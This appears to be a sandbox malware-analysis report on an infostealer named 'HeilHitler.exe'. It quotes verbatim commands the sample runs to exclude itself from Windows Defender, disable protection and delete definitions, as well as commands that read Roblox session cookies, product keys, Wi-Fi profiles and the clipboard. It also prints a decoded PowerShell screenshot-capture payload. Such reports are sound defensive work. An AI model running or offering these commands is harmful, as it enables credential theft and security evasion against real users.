              Source: C:\Users\user\Desktop\HeilHitler.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep count: 8671 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep count: 745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep count: 8440 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep count: 891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136 | Thread sleep count: 1103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 | Thread sleep count: 3163 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 | Thread sleep count: 1576 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 | Thread sleep count: 4772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 | Thread sleep count: 1408 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 | Thread sleep count: 4300 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep count: 1346 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2108 | Thread sleep count: 3813 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 | Thread sleep count: 409 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 | Thread sleep count: 2502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 | Thread sleep count: 1692 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\tree.com | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\tree.com | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D69280 FindFirstFileExW,FindClose
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D69280 FindFirstFileExW,FindClose
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAF43229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C246EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C1E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C688E0 FindFirstFileExA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\
Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"t
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
Source: getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1795863967.000001B102B52000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796004329.000001B102B4D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWK0
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-Vn
Source: getmac.exe, 00000032.00000003.1796167702.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1796590383.000001B102B26000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: getmac.exe, 00000032.00000003.1796493147.000001B102B50000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000003.1795863967.000001B102B52000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000032.00000002.1797516365.000001B102B50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD436E3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD436E9000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2032871935.000001BD44140000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1906535342.000001BD436B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
Source: HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAF31940 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D83480 GetProcessHeap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D6D30C SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 0_2_00007FF633D7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D6D30C SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FF633D7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAD63048 IsProcessorFeaturePresent,00007FFE133319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE133319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAE82009 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAF45A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C5B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C5B6D8 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C5A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | Code function: 68_2_00007FF702C64C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded
$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot
{
    public static List<Bitmap> CaptureScreens()
    {
        var results = new List<Bitmap>();
        var allScreens = Screen.AllScreens;
        foreach (Screen screen in allScreens)
        {
            try
            {
                Rectangle bounds = screen.Bounds;
                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                {
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                    }
                    results.Add((Bitmap)bitmap.Clone());
                }
            }
            catch (Exception)
            {
                // Handle any exceptions here
            }
        }
        return results;
    }
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()
for ($i = 0; $i -lt $screenshots.Count; $i++)
{
    $screenshot = $screenshots[$i]
    $screenshot.Save("./Display ($($i+1)).png")
    $screenshot.Dispose()
}
Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (6 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend (6 identical entries)
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" (2 identical entries)
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" (2 identical entries)
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
